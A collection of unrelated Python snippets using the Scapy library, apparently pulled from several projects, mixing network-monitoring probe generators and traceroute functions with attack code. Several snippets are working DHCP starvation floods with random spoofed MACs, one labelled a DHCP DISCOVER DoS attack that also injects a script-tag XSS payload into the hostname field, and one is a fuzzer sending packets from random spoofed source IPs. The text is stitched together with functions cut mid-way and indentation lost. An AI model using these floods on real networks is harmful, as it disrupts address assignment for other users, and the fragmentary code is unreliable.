def run(self, hosts):
# Send SYN with random Src Port for each Dst port
for host in hosts:
print(host)
packet = IP(dst=host) / UDP() / ISAKMP(
init_cookie=RandString(8),
exch_type="identity prot.") / ISAKMP_payload_SA(
prop=ISAKMP_payload_Proposal())
self.send_receive(packet, timeout=2, verbose=0)
def run(self):
baseip = ".".join(self.router.split('.')[0:-1]) + '.'
targetip = baseip+self.last
confs.checkIPaddr = False
hw = get_if_raw_hwaddr(confs.iface)
dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/\
IP(src="0.0.0.0",dst="255.255.255.255")/\
UDP(sport=68, dport=67)/\
BOOTP(chaddr=RandString(RandNum(1,50)))/\
DHCP(options=[("message-type","discover"),"end"])
sendp(dhcp_discover, verbose=0)
def main():
ether = Ether(src=RandMAC())
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
bootp = BOOTP(chaddr=RandString(12, "1234567890asdfgs"))
dhcp = DHCP(options=[("message-type", 'discover'), "end"])
pkt = ether / ip / udp / bootp / dhcp
for x in xrange(100000):
sendp(pkt)
def generator(self, ip_dst, n_generations, n_packets, selected_layer):
# Select the final layer for randomize
if selected_layer == "UDP":
layer = UDP()
elif selected_layer == "TCP":
layer = TCP()
else:
layer = ICMP()
for i in range(n_generations):
print('Generating packets. (%s of %s)\n' % (i + 1, n_generations))
pkts_send = [
fuzz(IP(dst=ip_dst, src=RandIP())) / fuzz(layer) /
str(RandString()) for j in range(n_packets)
]
self.send_pkts(pkts_send)
def run(interface, xs):
"""
This function launch DHCP DISCOVER DOS attack
:param inter: interface to be launched the attack
:type inter: str
"""
global src_mac
global xi
global follow
global inter
follow = False
#if len(interface) > 0:
inter = interface
if xs == "":
xss = "<script>alert('hola')</script>"
else:
xss = xs
try:
src_mac = get_if_hwaddr(inter)
print str(src_mac)
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=str(src_mac), type=0x800)
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
while not follow:
xi = RandString(8, "1234567890abcdef")
xi = "0x" + str(xi)
res = src_mac.split(":")
ch = ""
for i in res:
ch = ch + chr(int(i, 16))
bootps = BOOTP(xid=int(xi, 16), ciaddr='0.0.0.0', chaddr=ch)
host = "<script>alert('hola')</script>"
dhcps = DHCP(options=[("message-type",
"discover"), ("hostname", host), "end"])
packet = ethernet / ip / udp / bootps / dhcps
conf.checkIPaddr = False
pkt = srp1(packet, iface=inter, verbose=1)
if BOOTP in pkt:
is_DHCP(pkt)
#sniff(prn=is_DHCP, filter="udp and (port 67 or 68)", iface=inter
except KeyboardInterrupt:
pass
def srv6_traceroute(destination, result_table, packet_len, max_ttl, sr_hops,
verbosity, timeout):
ttl = 1
while ttl <= max_ttl:
p = sr1(IPv6(dst=destination, hlim=ttl) /
IPv6ExtHdrSegmentRouting(addresses=sr_hops) /
ICMPv6EchoRequest(data=RandString(packet_len)),
timeout=timeout,
verbose=verbosity)
if p is not None:
if not ttl in result_table:
result_table[ttl] = {}
result_table[ttl]["SR"] = p[IPv6].src
else:
result_table[ttl]["SR"] = "-"
ttl += 1
return result_table
def icmp_traceroute(destination, result_table, packet_len, verbosity, timeout):
ttl = 1
while 1:
start_time = time.time()
p = sr1(IPv6(dst=destination, hlim=ttl) /
ICMPv6EchoRequest(data=RandString(packet_len)),
verbose=verbosity,
timeout=timeout)
end_time = time.time()
latency = ((end_time - start_time) * 1000)
if not ttl in result_table:
result_table[ttl] = {}
if p is not None:
if p[IPv6].src.startswith('fe'):
result_table[ttl]["ASN"] = "Link local"
else:
result_table[ttl]["ASN"] = get_asn_description(p[IPv6].src)
result_table[ttl]["ICMP"] = p[IPv6].src
if latency > 2000:
result_table[ttl]["latency"] = "Timeout"
else:
result_table[ttl]["latency"] = str(latency)
if ICMPv6EchoReply in p:
break
else:
result_table[ttl]["latency"] = "-"
result_table[ttl]["ASN"] = "-"
result_table[ttl]["ICMP"] = "-"
ttl += 1
max_hops = ttl
return (max_hops, result_table)
default="eth0",
help=u'interfaz de salida de peticiones. Defecto eth0',
metavar="string")
return comlist.parse_args(sys.argv)
#####################################################################################
# INICIO DEL PROGRAMA
#####################################################################################
opts, args = proc_opts()
dhcp_discover = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff") / IP(
src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) / BOOTP(
chaddr=RandString(12, '0123456789abcdef')) / DHCP(
options=[("message-type", "discover"), "end"])
num = 0
while num < int(opts.numero):
sendp(dhcp_discover, iface=opts.interfaz)
time.sleep(1)
num += 1
#####################################################################################
# Para crear un paquete DHCPDiscovery necesitamos:
# #
# -Capa de enlace (Ether): #
# src: MAC de origen, o MAC del equipo que hace la peticion dhcp. Gracias a
# la funcion RandMAC de scapy se crea una MAC aleatoriamente.
# #
def generate_packets(self, all_groups, id_gen, logging_level="WARNING"):
"""Create and store packets used for probing.
Keyword arguments:
all_groups -- list of all group objects
logging_level -- logging level for targets class
"""
# set logging level
log_udp_unreachable.setLevel(logging_level)
# cleaning existing packets
del self.packets[:]
# Check if we want to set the DF bit
ip_kwargs = {}
if self.address_family == "ipv4":
df_value = 2 if self.dont_fragment else 0
ip_kwargs["flags"] = df_value
# generate payload at the good size
udp_payload = Raw(RandString(size=self.proto_payload_size))
ip_kwargs = {}
# get an IP object and a source address depending on the desired address-family
af_ip_object = af_to_ip_protocol(self.address_family)
# we create the packet only for associated groups
for grp in [group for group in all_groups if group.name in self.groups]:
src_ip = group_source_address(grp, self.address_family)
if not src_ip:
log_udp_unreachable.debug(
"no source address found in group %s to reach %s", grp.name, self.destination
)
src_network = get_src_subnet(self.address_family, grp)
src_port = grp.src_port_a
# get tos header field name for the current address-family
tos_header_field = af_to_ip_header_fields(self.address_family, "tos")
ip_kwargs[tos_header_field] = dscp_to_tos(grp.dscp)
for n_packet in range(self.nb_packets):
# we select a source IP address if a range is provided
if src_network:
ip_index = n_packet % (src_network.num_addresses - 1) + 1
src_ip = src_network[ip_index].compressed
# if src_subnet is defined > round robin on source port only
# if not defined > round robin on source IP and source port
# source port changes only when a cycle is finished on the source IP round robin
if not src_network or ip_index == 1:
src_port = n_packet % (grp.src_port_z - grp.src_port_a + 1) + grp.src_port_a
# we get the next sequence number
id_header_field = af_to_ip_header_fields(self.address_family, "id")
ip_kwargs[id_header_field] = id_gen.send(1)
ip_pkts = af_ip_object(src=src_ip, dst=self.destination, **ip_kwargs)
pkts = []
if self.is_subnet:
pkts.extend(ip_pkts)
else:
pkts.append(ip_pkts)
self.packets.extend(
[(pkt / UDP(dport=self.dst_port, sport=src_port) / udp_payload) for pkt in pkts]
)
log_udp_unreachable.debug("%s: packets generated", self.name)
def generate_packets(self, all_groups, logging_level="WARNING"):
"""Create and store packets used for probing.
Keyword arguments:
all_groups -- list of all group objects
logging_level -- logging level for targets class
"""
# set logging level
log_icmp.setLevel(logging_level)
# cleaning existing packets
del self.packets[:]
# Check if we want to set the DF bit
ip_kwargs = {}
if self.address_family == "ipv4":
df_value = 0
if self.dont_fragment:
df_value = 2
ip_kwargs["flags"] = df_value
# ICMP echo-request id
icmp_id = randint(1, 10000)
# get an IP object and a source address depending on the desired address-family
try:
af_ip_object = af_to_ip_protocol(self.address_family)
except ValueError as error:
log_icmp.error("could not get IP object: %s", error)
return
# depending on the af, get the correct ICMP protocol
try:
icmp_object = af_to_icmp(self.address_family)
except ValueError as error:
log_icmp.error("could not get ICMP object: %s", error)
return
# we create the packet only for associated groups
for grp in all_groups:
if grp.name in self.groups:
src_ip = group_source_address(grp, self.address_family)
if not src_ip:
log_icmp.debug(
"no source address found in group %s to reach %s",
grp.name,
self.destination,
)
src_network = get_src_subnet(self.address_family, grp)
# get tos header field name for the current address-family
tos_header_field = af_to_ip_header_fields(self.address_family, "tos")
ip_kwargs[tos_header_field] = dscp_to_tos(grp.dscp)
# if not target payload and group payload exist ==> proto payload (group)
if not self.config_ip_payload_size and grp.ip_payload_size:
payload_size = calculate_payload_size(
grp.ip_payload_size, self.ICMP_HEADER_SIZE
)[1]
else:
# if target payload is defined ==> proto payload (target)
payload_size = self.proto_payload_size
for i in range(0, self.nb_packets):
# we select a source IP address if a range is provided
if src_network:
ip_index = i % (src_network.num_addresses - 1) + 1
src_ip = src_network[ip_index].compressed
icmp_payload = Raw(RandString(size=payload_size))
if self.is_subnet:
# packet creations using the port range for each address in range
for ip_pkt in af_ip_object(src=src_ip, dst=self.destination, **ip_kwargs):
pkt = ip_pkt / icmp_object(id=icmp_id, seq=i) / icmp_payload
# store the packets
self.packets.append(pkt)
else:
# packet creations in one shot using the port range
pkt = (
af_ip_object(src=src_ip, dst=self.destination, **ip_kwargs)
/ icmp_object(id=icmp_id, seq=i)
/ icmp_payload
)
# store the packets
self.packets.append(pkt)
log_icmp.debug("%s: packets generated", self.name)
def generate_packets(self, all_groups, seq_gen, logging_level="WARNING"):
"""Create and store packets used for probing.
Keyword arguments:
all_groups -- list of all group objects
logging_level -- logging level for targets class
"""
# set logging level
log_tcpsyn.setLevel(logging_level)
# cleaning existing packets
del self.packets[:]
del self.packets_rst[:]
# Check if we want to set the DF bit
ip_kwargs = {}
if self.address_family == "ipv4":
df_value = 0
if self.dont_fragment:
df_value = 2
ip_kwargs["flags"] = df_value
# get an IP object depending on the desired address-family
af_ip_object = af_to_ip_protocol(self.address_family)
# generate payload at the good size
tcp_payload = Raw(RandString(size=self.proto_payload_size))
# we create the packet only for associated groups
for grp in all_groups:
if grp.name in self.groups:
# get tos header field name for the current address-family
tos_header_field = af_to_ip_header_fields(
self.address_family, "tos")
ip_kwargs[tos_header_field] = dscp_to_tos(grp.dscp)
# packet creations in one shot using the port range
src_ip = group_source_address(grp, self.address_family)
if not src_ip:
log_tcpsyn.debug(
"no source address found in group %s to reach %s",
grp.name,
self.destination,
)
src_network = get_src_subnet(self.address_family, grp)
src_port = grp.src_port_a
for n_packet in range(self.nb_packets):
# we select a source IP address if a range is provided
if src_network:
ip_index = n_packet % (src_network.num_addresses -
1) + 1
src_ip = src_network[ip_index].compressed
# if src_subnet is defined > round robin on source port only
# if not defined > round robin on source IP and source port
# source port changes only when a cycle is finished on the source IP round robin
if not src_network or ip_index == 1:
src_port = n_packet % (grp.src_port_z - grp.src_port_a
+ 1) + grp.src_port_a
# we get the next sequence number
seq_id = seq_gen.send(1)
# we store the seq id ranges (min and max)
if self.min_seq is None:
self.min_seq = seq_id
self.max_seq = seq_id
af_ip_pkt = af_ip_object(src=src_ip,
dst=self.destination,
**ip_kwargs)
if self.is_subnet:
# packet creations using the port range for each address in range
for ip_pkt in af_ip_pkt:
pkt = (ip_pkt / TCP(flags="S",
seq=seq_id,
dport=self.dst_port,
sport=src_port) / tcp_payload)
packets_rst = ip_pkt / TCP(flags="R",
seq=seq_id,
dport=self.dst_port,
sport=src_port)
# store the packets
self.packets.append(pkt)
self.packets_rst.append(packets_rst)
else:
pkt = (af_ip_pkt / TCP(flags="S",
seq=seq_id,
dport=self.dst_port,
sport=src_port) / tcp_payload)
packets_rst = af_ip_pkt / TCP(flags="R",
seq=seq_id,
dport=self.dst_port,
sport=src_port)
# store the packets
self.packets.append(pkt)
self.packets_rst.append(packets_rst)
# we jump seq in range [seq, seq + TCP payload]
# for the next packet of this target, or or the next target
seq_id = seq_gen.send(self.proto_payload_size)
log_tcpsyn.debug("%s: packets generated", self.name)